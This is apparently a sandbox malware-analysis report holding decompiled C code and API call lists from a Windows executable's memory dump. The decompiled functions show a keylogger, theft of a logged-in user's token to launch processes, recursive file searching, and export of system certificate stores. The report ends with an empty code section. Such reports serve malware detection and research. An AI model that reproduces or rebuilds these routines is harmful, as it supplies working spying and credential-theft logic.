    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EF0
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F05
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F1A
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F2F
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407F44
    • LoadCursorW.USER32(00000000,00007F00), ref: 00408009
    • GetIconInfo.USER32(00000000,?), ref: 0040801A
    • GetCursorPos.USER32(?), ref: 00408024
    • DrawIcon.USER32(?,?,?,?), ref: 004080B3
      • Part of subcall function 00409EE6: OpenWindowStationA.USER32(?,00000000,10000000), ref: 00409EFA
      • Part of subcall function 00409EE6: SetProcessWindowStation.USER32(00000000), ref: 00409F07
      • Part of subcall function 00409EE6: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 00409F1C
      • Part of subcall function 00409EE6: SetThreadDesktop.USER32(00000000), ref: 00409F29
      • Part of subcall function 00409EE6: CloseDesktop.USER32(00000000), ref: 00409F32
      • Part of subcall function 00409EE6: CloseWindowStation.USER32(00000000), ref: 00409F39
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 00408133
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Load$DesktopLibraryStationWindow$CloseCursorIconOpen$AllocateDrawHeapInfoProcessThreadlstrcmpi
    • String ID: W@
    • API String ID: 1533534080-1911609031
    • Opcode ID: cf2faf7fe43061ffe7c1e75efef07f15dd088ff130b0facf3562832776f72813
    • Instruction ID: bad00d38a9b6f9792e5d397bb277e733b11babb554457f0f7ea104e02bfb41d8
    • Opcode Fuzzy Hash: cf2faf7fe43061ffe7c1e75efef07f15dd088ff130b0facf3562832776f72813
    • Instruction Fuzzy Hash: 3AE11371900218EFCB219FA4DE88AEEBBB9FF08700F14807AF545E6261DB754A51DF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00409CF9(long _a4, WCHAR* _a8, WCHAR* _a12) {
    				void* _v12;
    				void* _v16;
    				_Unknown_base(*)()* _v20;
    				struct _PROCESS_INFORMATION _v36;
    				struct _STARTUPINFOW _v112;
    				int _t48;
    				signed int _t63;
    				struct HINSTANCE__* _t74;
    				_Unknown_base(*)()* _t77;
    				long _t81;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				void* _t84;
    				void* _t85;
    				signed int _t86;
    				struct HINSTANCE__* _t87;
    
    				_t81 = 0x44;
    				_t86 = 0;
    				E0040CFFE( &_v112,  &_v112, 0, _t81);
    				_v112.cb = _t81;
    				_v112.lpDesktop = 0;
    				if(_a4 == 0 || ( *0x412af8 & 0x00000001) != 0 || E00409EE6() == 0) {
    					L26:
    					_t48 = CreateProcessW(_a8, _a12, 0, 0, 0, 0, 0, 0,  &_v112,  &_v36);
    					if(_t48 == 0) {
    						return _t48;
    					}
    					goto L27;
    				} else {
    					_v16 = 0;
    					_t82 = GetProcAddress( *0x412c18, "WTSGetActiveConsoleSessionId");
    					if(_t82 == 0) {
    						L10:
    						_a4 = 0;
    						if(GetWindowThreadProcessId(GetForegroundWindow(),  &_a4) > 0) {
    							_t84 = OpenProcess(0x400, 0, _a4);
    							if(_t84 != 0) {
    								if(OpenProcessToken(_t84, 0xb,  &_v16) != 0) {
    									_t86 = 1;
    								}
    								CloseHandle(_t84);
    							}
    						}
    						if(_t86 != 1) {
    							goto L26;
    						} else {
    							L16:
    							_v12 = 0;
    							if(DuplicateTokenEx(_v16, 0x2000000, 0, 1, 1,  &_v12) != 0) {
    								_t87 = LoadLibraryA("userenv.dll");
    								_v20 = 0;
    								_a4 = 0;
    								if(_t87 != 0) {
    									_t83 = GetProcAddress(_t87, "CreateEnvironmentBlock");
    									_v20 = GetProcAddress(_t87, "DestroyEnvironmentBlock");
    									if(_t83 != 0) {
    										_push(0);
    										_push(_v12);
    										_push( &_a4);
    										if( *_t83() == 0) {
    											_a4 = 0;
    										}
    									}
    								}
    								_t63 = CreateProcessAsUserW(_v12, _a8, _a12, 0, 0, 0, 0x400, _a4, 0,  &_v112,  &_v36);
    								asm("sbb esi, esi");
    								_t86 =  ~( ~_t63);
    								if(_v20 != 0 && _a4 != 0) {
    									_v20(_a4);
    								}
    								CloseHandle(_v12);
    							}
    							CloseHandle(_v16);
    							if(_t86 == 1) {
    								L27:
    								CloseHandle(_v36);
    								CloseHandle(_v36.hThread);
    								return _v36.dwProcessId;
    							} else {
    								goto L26;
    							}
    						}
    					}
    					_t74 = LoadLibraryA("wtsapi32.dll");
    					_a4 = _t74;
    					if(_t74 != 0) {
    						_t85 =  *_t82();
    						if(_t85 != 0xffffffff) {
    							_t77 = GetProcAddress(_a4, "WTSQueryUserToken");
    							if(_t77 != 0) {
    								_push( &_v16);
    								_push(_t85);
    								if( *_t77() != 0) {
    									_t86 = 1;
    								}
    							}
    						}
    						FreeLibrary(_a4);
    						if(_t86 == 1) {
    							goto L16;
    						}
    					}
    					goto L10;
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32(WTSGetActiveConsoleSessionId,00000000), ref: 00409D4B
    • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 00409D5C
    • GetProcAddress.KERNEL32(?,WTSQueryUserToken), ref: 00409D7A
    • FreeLibrary.KERNEL32(?), ref: 00409D93
    • GetForegroundWindow.USER32(?), ref: 00409DA5
    • GetWindowThreadProcessId.USER32(00000000), ref: 00409DAC
    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00409DBF
    • OpenProcessToken.ADVAPI32(00000000,0000000B,?), ref: 00409DD2
    • CloseHandle.KERNEL32(00000000), ref: 00409DE0
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 00409E03
    • LoadLibraryA.KERNEL32(userenv.dll), ref: 00409E16
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00409E2E
    • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 00409E3C
    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 00409E77
    • CloseHandle.KERNEL32(?), ref: 00409E98
    • CloseHandle.KERNEL32(?), ref: 00409EA1
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000044,?,?,00000000), ref: 00409EC0
    • CloseHandle.KERNEL32(?), ref: 00409ECD
    • CloseHandle.KERNEL32(?), ref: 00409ED6
      • Part of subcall function 00409EE6: OpenWindowStationA.USER32(?,00000000,10000000), ref: 00409EFA
      • Part of subcall function 00409EE6: SetProcessWindowStation.USER32(00000000), ref: 00409F07
      • Part of subcall function 00409EE6: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 00409F1C
      • Part of subcall function 00409EE6: SetThreadDesktop.USER32(00000000), ref: 00409F29
      • Part of subcall function 00409EE6: CloseDesktop.USER32(00000000), ref: 00409F32
      • Part of subcall function 00409EE6: CloseWindowStation.USER32(00000000), ref: 00409F39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Close$Process$HandleWindow$AddressOpenProc$DesktopLibraryStation$CreateLoadThreadToken$DuplicateForegroundFreeUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$WTSGetActiveConsoleSessionId$WTSQueryUserToken$userenv.dll$wtsapi32.dll
    • API String ID: 1454815141-2217652461
    • Opcode ID: 4634a9fd64ae56bdea817414a2c978bb64d770cbe7729a0052fdc8ed12a0ba51
    • Instruction ID: ba2d72c0ec52dc0befdce92057e163bbeeafde8d8eab2dc1d08fda54c98b0b40
    • Opcode Fuzzy Hash: 4634a9fd64ae56bdea817414a2c978bb64d770cbe7729a0052fdc8ed12a0ba51
    • Instruction Fuzzy Hash: C6518072900219BFCF219FA0CD88AEE7F79EF04341F14803AFA15E61A1DB758D518B98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E004040B8(WCHAR* __ecx, intOrPtr __edx) {
    				char _v8;
    				void* _v12;
    				char _v16;
    				intOrPtr _v20;
    				WCHAR* _v24;
    				WCHAR* _v572;
    				WCHAR* _v574;
    				struct _WIN32_FIND_DATAW _v620;
    				short _v622;
    				short _v1140;
    				short _v1660;
    				void* _t57;
    				int _t63;
    				long _t67;
    				intOrPtr _t69;
    				WCHAR** _t70;
    				int _t72;
    				intOrPtr _t79;
    				intOrPtr _t82;
    				WCHAR* _t87;
    				long _t89;
    				intOrPtr _t93;
    				signed int _t99;
    				intOrPtr _t100;
    				char _t101;
    				void* _t102;
    
    				_t98 = __edx;
    				_t97 = __ecx;
    				_v20 = __edx;
    				_v24 = __ecx;
    				PathCombineW( &_v1140, __ecx, "*");
    				_v622 = 0;
    				_t57 = FindFirstFileW( &_v1140,  &_v620);
    				_v12 = _t57;
    				if(_t57 != 0xffffffff) {
    					__eflags = 0;
    					do {
    						__eflags = _v620.cFileName - 0x2e;
    						if(_v620.cFileName != 0x2e) {
    							L7:
    							__eflags = _v620.dwFileAttributes & 0x00000010;
    							if((_v620.dwFileAttributes & 0x00000010) == 0) {
    								 *0x412dd4(0x4126c8);
    								_t99 = 0;
    								__eflags =  *0x4126e0; // 0x0
    								if(__eflags <= 0) {
    									L21:
    									 *0x412dd8(0x4126c8);
    									Sleep(0x14);
    									L22:
    									__eflags =  *0x4126e0; // 0x0
    									if(__eflags <= 0) {
    										break;
    									}
    									goto L23;
    								} else {
    									goto L11;
    								}
    								do {
    									L11:
    									_t69 =  *0x4126e4; // 0x0
    									_t70 = _t69 + _t99 * 4;
    									__eflags =  *_t70;
    									if( *_t70 == 0) {
    										goto L16;
    									}
    									__eflags = _v620.nFileSizeHigh;
    									if(_v620.nFileSizeHigh != 0) {
    										goto L16;
    									}
    									_t72 = PathMatchSpecW( &(_v620.cFileName),  *_t70);
    									__eflags = _t72;
    									if(_t72 == 0) {
    										goto L16;
    									}
    									PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
    									_t101 = _v620.nFileSizeLow;
    									_t79 =  *0x412a64; // 0x246f5a8
    									_v8 = 4;
    									_v16 = 0;
    									__eflags = E00407559(0x80000001,  *((intOrPtr*)(_t79 + 0x168)),  &_v1140, 0,  &_v16,  &_v8);
    									if(__eflags == 0) {
    										L18:
    										_t82 =  *0x412a64; // 0x246f5a8
    										wnsprintfW( &_v1660, 0x103,  *(_t82 + 0x16c), _v620.nFileSizeLow,  &(_v620.cFileName));
    										_t102 = _t102 + 0x14;
    										_t87 = E00410F35(_t97, _t98, __eflags,  &_v1140, 0,  &_v1660);
    										__eflags = _t87;
    										if(_t87 != 0) {
    											_v8 = _v620.nFileSizeLow;
    											_t93 =  *0x412a64; // 0x246f5a8
    											E004075A2(0x80000001,  *((intOrPtr*)(_t93 + 0x168)),  &_v1140, 4,  &_v8, 4);
    										}
    										_t89 = WaitForSingleObject( *(_v20 + 4), 0x2710);
    										__eflags = _t89;
    										if(_t89 == 0) {
    											goto L24;
    										} else {
    											goto L21;
    										}
    									}
    									__eflags = _t101 - _v16;
    									if(__eflags != 0) {
    										goto L18;
    									}
    									L16:
    									_t99 = _t99 + 1;
    									__eflags = _t99 -  *0x4126e0; // 0x0
    								} while (__eflags < 0);
    								goto L21;
    							}
    							PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
    							_t100 = _v20;
    							_t67 = WaitForSingleObject( *(_t100 + 4), 0x3e8);
    							__eflags = _t67;
    							if(_t67 == 0) {
    								break;
    							}
    							_t98 = _t100;
    							_t97 =  &_v1140;
    							E004040B8( &_v1140, _t100);
    							goto L22;
    						}
    						__eflags = _v574;
    						if(_v574 == 0) {
    							goto L22;
    						}
    						__eflags = _v574 - 0x2e;
    						if(_v574 != 0x2e) {
    							goto L7;
    						}
    						__eflags = _v572;
    						if(_v572 == 0) {
    							goto L22;
    						}
    						goto L7;
    						L23:
    						_t63 = FindNextFileW(_v12,  &_v620);
    						__eflags = _t63;
    					} while (_t63 != 0);
    					L24:
    					FindClose(_v12);
    					return 1;
    				}
    				return 0;
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,00401040), ref: 004040D7
    • FindFirstFileW.KERNEL32(?,?,?,00401040), ref: 004040F4
    • PathCombineW.SHLWAPI(?,?,0000002E,?,00401040), ref: 00404153
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00401040), ref: 00404164
    • FindNextFileW.KERNEL32(?,00000010,?,00401040), ref: 004042D7
    • FindClose.KERNEL32(?,?,00401040), ref: 004042E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$CombineFilePath$CloseFirstNextObjectSingleWait
    • String ID: .$.
    • API String ID: 3352328711-3769392785
    • Opcode ID: 470571a41d0df8c2e0b2c136e64cf63f21a053f071b5516177947fd293491bca
    • Instruction ID: cf7a5b052dfe51dc5fe498fc60605e172cc81fd168000d96ea4ad3b343d47568
    • Opcode Fuzzy Hash: 470571a41d0df8c2e0b2c136e64cf63f21a053f071b5516177947fd293491bca
    • Instruction Fuzzy Hash: 31513DB1A00219EFCF20DFA4DD48AEA77B8FB44344F0041FAA609F21A0D7759A95DF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004056B3(void* __edx, int _a4) {
    				char _v520;
    				short _v524;
    				char _v780;
    				short _v782;
    				short _v784;
    				char _v785;
    				void* __edi;
    				void* __esi;
    				int _t23;
    				intOrPtr _t35;
    				long _t39;
    				intOrPtr _t40;
    				void* _t50;
    				void* _t51;
    				void* _t56;
    				intOrPtr* _t60;
    				intOrPtr _t67;
    
    				_t51 = __edx;
    				_t23 = _a4;
    				if(_t23 == 0) {
    					L15:
    					return _t23;
    				}
    				_t23 =  *(_t23 + 4);
    				if(_t23 != 0x201) { // 0x201 = WM_LBUTTONDOWN
    					if(_t23 != 0x100) { // 0x100 = WM_KEYDOWN
    						goto L15;
    					}
    					_t23 = GetKeyState(0x11); // VK_CONTROL
    					if((0x80000000 & _t23) != 0) { // sign bit set = key down: Ctrl chords are not logged
    						goto L15;
    					}
    					_t23 = GetKeyState(0x12); // VK_MENU (Alt)
    					if((0x80000000 & _t23) != 0) {
    						goto L15;
    					}
    					L10:
    					_v782 = 0;
    					_t23 = GetKeyboardState( &_v780);
    					if(_t23 != 0) {
    						_t23 = ToUnicode( *(_a4 + 8), 0,  &_v780,  &_v784, 1, 0); // *(_a4 + 8) = virtual-key code, translated under the captured keyboard state
    						if(_t23 == 1) {
    							_v785 = 0;
    							_t23 = WideCharToMultiByte(0, 0,  &_v784, 1,  &_v785, 1, 0, 0);
    							if(_t23 != 0 && _v785 != 0) {
    								_t23 = E00405452(_t50, 1,  &_v785);
    							}
    						}
    					}
    					goto L15;
    				}
    				_t67 =  *0x41272c; // 0x0
    				if(_t67 == 0) {
    					goto L15;
    				} else {
    					 *0x41272c =  *0x41272c + 0xffff;
    					_t35 =  *0x412a64; // 0x246f5a8
    					_t60 = E00407D61( *((intOrPtr*)(_t35 + 0x70)), 0x1e, 0x1f4);
    					if(_t60 != 0) {
    						_t39 = GetCurrentProcessId();
    						_t40 =  *0x412a64; // 0x246f5a8
    						wnsprintfW( &_v524, 0x103,  *(_t40 + 0x74), _t56, _t39);
    						E00410E5B(_t51, _t60,  &_v520);
    						 *((intOrPtr*)( *_t60 + 8))(_t60, GetTickCount());
    					}
    					goto L10;
    				}
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 00405720
    • GetCurrentProcessId.KERNEL32(00000000), ref: 00405727
    • wnsprintfW.SHLWAPI ref: 00405744
    • GetKeyState.USER32(00000011), ref: 0040576F
    • GetKeyState.USER32(00000012), ref: 00405781
    • GetKeyboardState.USER32(?), ref: 00405798
    • ToUnicode.USER32(?,00000000,?,?,00000001,00000000), ref: 004057B8
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 004057D6
      • Part of subcall function 00407D61: LoadLibraryA.KERNELBASE(?), ref: 00407D78
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407D8C
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DA1
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DB6
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DCB
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DE0
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407DF5
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407E0A
      • Part of subcall function 00407D61: LoadLibraryA.KERNELBASE(?), ref: 00407E66
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407E7A
      • Part of subcall function 00407D61: LoadLibraryA.KERNELBASE(?), ref: 00407E9E
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EB2
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EC6
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EDB
      • Part of subcall function 00407D61: GetProcAddress.KERNELBASE(00000000,?), ref: 00407EF0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$LibraryLoadState$ByteCharCountCurrentKeyboardMultiProcessTickUnicodeWidewnsprintf
    • String ID: unknown
    • API String ID: 1117135736-2904991687
    • Opcode ID: 1c1cceccacc251a422eb73dcb1113c2b237503ecb8c6db4a6ccc2e5ba8821016
    • Instruction ID: 13dd452c579fea961c17610e0d6b63a161909147fde0071d2cb0a0b63813d6ef
    • Opcode Fuzzy Hash: 1c1cceccacc251a422eb73dcb1113c2b237503ecb8c6db4a6ccc2e5ba8821016
    • Instruction Fuzzy Hash: 38310272500205AFDB20DFA8DD88EEB77ECEB48340F04443AF945E7292D678DD54AB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A077(WCHAR* __ecx, intOrPtr __edx) {
    				short _v524;
    				short _v532;
    				char _v540;
    				short _v1076;
    				short _v1078;
    				struct _WIN32_FIND_DATAW _v1124;
    				struct _WIN32_FIND_DATAW _v1132;
    				intOrPtr _v1136;
    				intOrPtr _v1140;
    				void* _t29;
    				signed char _t46;
    				void* _t52;
    				WCHAR* _t55;
    
    				_t55 = __ecx;
    				_v1132.ftLastAccessTime = __edx;
    				PathCombineW( &_v524, __ecx, "*");
    				_t29 = FindFirstFileW( &_v532,  &_v1124);
    				_v1132.dwFileAttributes = _v1132.dwFileAttributes & 0x00000000;
    				_t52 = _t29;
    				if(_t52 == 0xffffffff) {
    					L13:
    					return _v1132.dwFileAttributes;
    				} else {
    					goto L1;
    				}
    				L11:
    				if(FindNextFileW(_t52,  &_v1132) != 0) {
    					L1:
    					if(_v1124.cFileName != 0x2e || _v1078 != 0 && (_v1078 != 0x2e || _v1076 != 0)) {
    						_t46 = _v1124.dwFileAttributes >> 0x00000004 & 0x00000001;
    						if(_t46 != 0 || PathMatchSpecW( &(_v1124.cFileName), _v1132.ftCreationTime) != 0) {
    							PathCombineW( &_v532, _t55,  &(_v1124.cFileName));
    							if(_t46 == 0) {
    								if(E0040DD3C( &_v540) != 0) {
    									_v1140 = _v1140 + 1;
    								}
    							} else {
    								_v1140 = _v1140 + E0040A077( &_v540, _v1136);
    							}
    						}
    					}
    					goto L11;
    				} else {
    					FindClose(_t52);
    					goto L13;
    				}
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040A09A
    • FindFirstFileW.KERNEL32(?,?), ref: 0040A0AD
    • PathMatchSpecW.SHLWAPI(?,?), ref: 0040A0F8
    • PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040A110
    • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040A14B
    • FindClose.KERNEL32(00000000), ref: 0040A15A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FindPath$CombineFile$CloseFirstMatchNextSpec
    • String ID: .$.
    • API String ID: 1774936002-3769392785
    • Opcode ID: 6ffe1b02f7f884b3d4d1746e8b022701e3e5643fa5994c2518c4caad3d80b5fb
    • Instruction ID: 616cf19c8545a9b498d636c37242e3a6fc1e683da75de21dfc1dd9590866db16
    • Opcode Fuzzy Hash: 6ffe1b02f7f884b3d4d1746e8b022701e3e5643fa5994c2518c4caad3d80b5fb
    • Instruction Fuzzy Hash: 4D219C315083459BC720DF64D888AAB77F8FB85314F00493EF584D61D0E7799969C79B
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00403DC6
    • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 00403DF1
    • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 00403E49
    • GetSystemTime.KERNEL32(?), ref: 00403E5C
    • wnsprintfW.SHLWAPI ref: 00403E89
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00403ED0
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00403EBD
    • CertDeleteCRLFromStore.CRYPT32(00000000), ref: 00403EC8
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 00403EE7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Cert$Store$ExportSystem$AllocateCertificateCertificatesCloseContextDeleteDuplicateEnumFromHeapOpenTimewnsprintf
    • String ID:
    • API String ID: 2815783250-0
    • Opcode ID: cde3e0e3174e037eb7f28989472ad42635e7b9af0623c7ab6d7b91b36a2b4540
    • Instruction ID: 5a1f29d30ed2a74827ae42b4523f4d4ed2054d9e65b94fc630f46f228d202559
    • Opcode Fuzzy Hash: cde3e0e3174e037eb7f28989472ad42635e7b9af0623c7ab6d7b91b36a2b4540
    • Instruction Fuzzy Hash: 8531C270108301AFC721DF65DD449ABBFEDEB88701F004A3AF954E2190D379DA10CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409115(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
    				short _v524;
    				void* __edi;
    				void* _t19;
    				void* _t33;
    				void** _t36;
    
    				_t33 = __ecx;
    				E00408F6C( &_v524, _a8);
    				_t36 = RtlAllocateHeap( *0x413e5c, 8, 0x18);
    				if(_t36 != 0) {
    					_t19 = CreateNamedPipeW( &_v524, 3, 6, 0xff, 0x200, 0x200, 0, 0); // PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE|PIPE_READMODE_MESSAGE, PIPE_UNLIMITED_INSTANCES, 0x200-byte buffers
    					 *_t36 = _t19;
    					if(_t19 != 0xffffffff) {
    						_t36[1] = CreateEventW(0, 0, 0, 0);
    						_t36[2] = CreateEventW(0, 0, 0, 0);
    						_t36[3] = _a4;
    						_t36[4] = E0040D0A7(_a8);
    						if(E0040A04D(_t33, E00408F8D, _t36) != 0) {
    							WaitForSingleObject(_t36[2], 0xffffffff);
    							return _t36;
    						}
    						CloseHandle( *_t36);
    						CloseHandle(_t36[1]);
    						CloseHandle(_t36[2]);
    						E0040CF40(_t36[4]);
    					}
    					E0040CF40(_t36);
    				}
    				return 0;
    			}

    APIs
      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 00408F75
      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,?), ref: 00408F83
    • RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 00409138
    • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00000200,00000200,00000000,00000000,?,00000001), ref: 00409166
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040917F
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040918C
      • Part of subcall function 0040A04D: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040A063
      • Part of subcall function 0040A04D: CloseHandle.KERNEL32(00000000,?,?,00408598,00408418,00000000), ref: 0040A06A
    • CloseHandle.KERNEL32(00000000,00408F8D,00000000,?,00000001), ref: 004091B7
    • CloseHandle.KERNEL32(?,?,00000001), ref: 004091C0
    • CloseHandle.KERNEL32(?,?,00000001), ref: 004091C9
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • WaitForSingleObject.KERNEL32(?,000000FF,00408F8D,00000000,?,00000001), ref: 004091DE
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateHandle$EventHeaplstrcpy$AllocateFreeNamedObjectPipeSingleThreadWait
    • String ID:
    • API String ID: 2368775089-0
    • Opcode ID: f64153033765fdea8b9e832eac11dd348388d25997d671cbce703252eecefb64
    • Instruction ID: 6edf2b1480bc95e501bfbcec51ca995fab891ec610460a8f35d82cef5620de89
    • Opcode Fuzzy Hash: f64153033765fdea8b9e832eac11dd348388d25997d671cbce703252eecefb64
    • Instruction Fuzzy Hash: 4E218030600302ABD7316F36DD0CD9BBEB9FB85750F00853AB9A6E21E1DB789911DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411039() {
    				char _v5;
    				struct _WIN32_FIND_DATAW _v604;
    				short _v1124;
    				void* __esi;
    				void* _t23;
    				void* _t25;
    				intOrPtr _t28;
    				void* _t29;
    				intOrPtr _t30;
    				intOrPtr _t32;
    				int _t35;
    				void* _t44;
    
    				_v5 = 0;
    				E00411018( &_v1124);
    				_t23 = FindFirstFileW( &_v1124,  &_v604);
    				if(_t23 == 0xffffffff) {
    					L5:
    					_t25 = FindFirstFileW(0x413260,  &_v604);
    					__eflags = _t25 - 0xffffffff;
    					if(_t25 == 0xffffffff) {
    						L16:
    						return _v5;
    					}
    					FindClose(_t25);
    					__eflags = _v604.nFileSizeLow;
    					if(_v604.nFileSizeLow > 0) {
    						L8:
    						_t28 =  *0x412a64; // 0x246f5a8
    						_t29 = CreateMutexW(0x413468, 0,  *(_t28 + 0x20));
    						__eflags = _t29;
    						if(_t29 == 0) {
    							_t44 = 0;
    							__eflags = 0;
    						} else {
    							_t44 = E0040F16D(_t29);
    						}
    						_t30 =  *0x412a64; // 0x246f5a8
    						E00409266(__eflags,  *((intOrPtr*)(_t30 + 0x2c)), 8, 0, 0, 0, 0);
    						__eflags = _v604.nFileSizeHigh;
    						if(_v604.nFileSizeHigh <= 0) {
    							__eflags = _v604.nFileSizeLow;
    							if(__eflags > 0) {
    								_t35 = MoveFileExW(0x413260,  &_v1124, 3); // MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED
    								__eflags = _t35;
    								_t16 =  &_v5;
    								 *_t16 = _t35 != 0;
    								__eflags =  *_t16;
    							}
    						} else {
    							E0040DD3C(0x413260);
    						}
    						_t32 =  *0x412a64; // 0x246f5a8
    						E00409266(__eflags,  *((intOrPtr*)(_t32 + 0x2c)), 7, 0, 0, 0, 0);
    						E0040F18E(_t44);
    						goto L16;
    					}
    					__eflags = _v604.nFileSizeHigh;
    					if(_v604.nFileSizeHigh <= 0) {
    						goto L16;
    					}
    					goto L8;
    				}
    				FindClose(_t23);
    				if(_v604.nFileSizeLow <= 0 || _v604.nFileSizeHigh != 0) {
    					E0040DD3C( &_v1124);
    					goto L5;
    				} else {
    					return 1;
    				}
    			}

    APIs
      • Part of subcall function 00411018: lstrcpyW.KERNEL32(00411377,00413260), ref: 00411021
      • Part of subcall function 00411018: lstrcatW.KERNEL32(?,.lll), ref: 00411030
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 00411064
    • FindClose.KERNEL32(00000000,?,?,?), ref: 00411070
    • FindFirstFileW.KERNEL32(00413260,?,?,?,?), ref: 004110A6
    • FindClose.KERNEL32(00000000,?,?,?), ref: 004110B6
    • CreateMutexW.KERNEL32(Function_00013468,00000000,?,?,?,?), ref: 004110DA
    • MoveFileExW.KERNEL32(00413260,?,00000003,?,00000008,00000000,00000000,00000000,00000000,?,?,?), ref: 00411126
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$File$CloseFirst$CreateMoveMutexlstrcatlstrcpy
    • String ID:
    • API String ID: 1879962031-0
    • Opcode ID: c49d8f8ce2ec92350ab08919c9416b1b1fd825c3927ae6fe70ba11250d49b870
    • Instruction ID: baac77c77af060c36f091461c942ff6f492aa6d784d21192ae79297750f282fe
    • Opcode Fuzzy Hash: c49d8f8ce2ec92350ab08919c9416b1b1fd825c3927ae6fe70ba11250d49b870
    • Instruction Fuzzy Hash: 57318FB1D04158BACB20ABA4DD84AEE777CAB09355F0042BAF304E2561D7784EC58B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
